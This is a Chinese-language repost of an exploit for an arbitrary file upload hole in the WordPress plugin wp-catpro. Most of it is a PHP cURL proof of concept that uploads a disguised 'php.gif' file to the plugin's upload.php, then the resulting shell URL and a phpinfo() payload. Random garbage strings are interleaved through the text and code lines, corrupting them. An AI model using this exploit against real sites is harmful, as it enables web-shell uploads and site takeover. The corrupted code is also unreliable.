WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
) X8 L0 u6 U4 F* g8 M& I% g: N#-----------------------------------------------------------------------

& S$ D$ |# n& Z' l# @$ j; c# M7 C6 W作者  => Zikou-16
4 i+ w8 C' w( H1 o) l" o: k5 l  |邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
% h1 r/ i7 q+ g8 b4 M7 d  |####
2 D2 X$ \! P8 M& F0 d( m, _5 x
#=> Exploit 信息:
% z9 C" H4 |6 S, ^) ~3 f( T& B------------------
3 M6 _+ A+ P0 K9 e# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
  P9 {9 y8 c9 E" r& _# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
5 A, S8 m3 V* W4 c------------------
% ~8 c; x5 Q7 q& l2 ]
#=> Exploit
: O) }* R* n. r/ r* q1 U-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
3 B: M3 Q1 X0 ~" ~) g1 k) Z1 h4 Lcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
$ q0 d' H; y' Q* Xarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
: j% R& `4 Q8 R) h  i9 l# l# T$postResult = curl_exec($ch);
% j( ?9 n2 F  p! p% acurl_close($ch);

' t7 T$ O0 a5 A4 Bprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
' A0 N2 a* z9 s2 U7 e& H  ?>
+ Y2 v7 L" p* v4 e<?php
phpinfo();
8 R$ v" c  f( ]5 e4 T?>